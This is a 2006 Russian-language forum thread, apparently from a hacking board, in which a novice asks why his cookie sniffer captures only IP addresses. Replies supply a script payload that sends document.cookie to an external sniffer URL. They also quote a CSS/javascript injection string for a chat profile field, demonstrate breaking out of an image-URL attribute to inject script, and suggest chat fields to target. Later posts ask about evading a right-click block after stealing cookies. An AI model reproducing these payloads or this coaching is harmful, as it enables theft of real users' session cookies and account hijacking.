|
Народ помогите
Народ помогите! Со снифером! почему когда я оставляю ссылку на снивер и ктонить на ней кликнет то в логе вот такая ЖОПА:
[Sun Mar 26 15:35:10 2006] IP=89.54.80.70 SITE= REFERER= QUERY=MT=1 AGENT= [Sun Mar 26 15:33:56 2006] IP=207.46.98.148 SITE= REFERER= QUERY= AGENT=msnbot/1.0 (+http://search.msn.com/msnbot.htm) Никаких куков ГДЕ ОНИ куда пропали!?!?!?!? :confused: :confused: :confused: ИЛИ я чет нитак делаю помогите плиз! |
ты забыл document.cookie
|
может даже у чела оутпост стоит и перекрывает рефер
|
Цитата:
|
<script>img = new Image(); img.src = "http://путь_к_снифферу/s.jpg?"+document.cookie;</script>
|
Цитата:
|
Если в чате есть XSS, то почему нет! Писать его надо там где пропускает html теги. А вообще то УЧИ МАТ ЧАСТЬ!
|
К примеру можешь писать в поле ник или цвет
|
Оставить ссылку на сниффер не достаточно.. Нужно сначало найти уязвимость, хсс в данному случае, а тогда уже внедрять ссылку на сниффер с кражой куков. А то, что они просто кликнут на линк, кроме айпи, тебе больше ничего не даст.
|
2 Автар А как же у тебя логи снифер пишет, если ты не знаешь куда вставлять скрипт???
|
Цитата:
|
Я качал я VIDEO.ANTICHAT.RU ролики и там вот напримере muz-tv_chat-xss чувак пишет:
В поле "О себе" ' style='background:url(javascript:document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg?/.sourse.replace(/x/g,String.fromCharcode(47))+opener.location)' s ОТКУДА ОН ВАЩЕ ЭТО ВЗЯЛ? Откуда узнал что это сработает? |
исходный код посмотри и всё поймёшь...
|
Цитата:
|
Цитата:
|
Цитата:
p.s. SORRI народ вы не думайте что я ламер но просто мне хочется узнать чуть больше обо всем этом!!! И к томуже вы тоже у когото этому научились :) так помогите и мне :) |
Хм... Почитай статьи на ачате про взлом чатов... Тебе станет немного понятней, что это =)
http://antichat.ru/crackchat/index.html http://antichat.ru/txt/old/chat_faq.shtm http://antichat.ru/crackchat/java.htmll |
Поищи в интернете в гугле www.google.com мануалы по XSS что да как и всё поймёш....
|
ПАСИБ! :) А что надо знать чтобы этим заниматся :confused:
|
http://antichat.ru/txt/old/chat_faq.shtml
http://antichat.ru/crackchat/java.html это так к слову... :D собственно вот в чём суть, если мы впишем в графе фото http://url_фотки/nax.jpg, то в окне "о себе" в html коде мы получим: PHP код:
собственно если вписать в графе фото http://url_фотки/nax.jpg"><script>alert("nax")</script>, то на выходе получим: PHP код:
дальше работает знание и воображение :D http://ha.ckers.org/xss.html - тут можешь посмотреть множество реализация javascript'ов, поможет в дальнейшем освоении xss а чтобы понимать xss нужно знание html и javascript |
Цитата:
А то в i-nete много таких а толку от них 0. Напиши если знаешь! Буду очень признателен:) |
|
ПАСИБ буду учить! Читать! :) :) :)
|
Мдя а сам найти не мог книги???
|
НАРОД! У мну вопросик!
Вот допустим есть чат на котором можно воткнуть картинку но только загрузкой с компа! Внимание вопрос: Можноли использовать это для того чтобы запустить СНИФЕР :confused: |
Я тк думую эта фишка почти во всех чатах и сней не запустиш снифер.
|
а если допусим я получил куки! а в чите скрипт отключающий правую кнопку мыши, его можно какнить обойти :confused:
|
А зачем тебе вообше правая конпка ?
|
Цитата:
|
народ а какие еще можно использовать программы кроме IE_XSS_Kit :confused:
|
| Время: 17:59 |